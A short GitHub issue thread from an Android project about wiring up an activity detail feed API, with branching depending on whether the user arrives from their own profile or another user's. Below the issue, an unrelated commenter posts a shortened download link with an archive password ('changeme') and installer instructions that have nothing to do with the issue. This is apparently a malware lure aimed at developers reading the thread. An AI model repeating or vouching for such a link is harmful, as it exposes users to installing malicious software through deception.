### ISSUE TITLE
feat: 활동 디테일 피드 api 연결

### ISSUE THREAD

**Issue by yeonjeen** [Team-WSS/WSS-Android#244]
## 📜 Overview (Required)    
마이 or 다른유저에서 넘어가는 경우에 따른 분기처리 및 api 연결

## 📌 Child Issue(Optional)  

No response  

## 📍 Note (Optional) 
No response

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
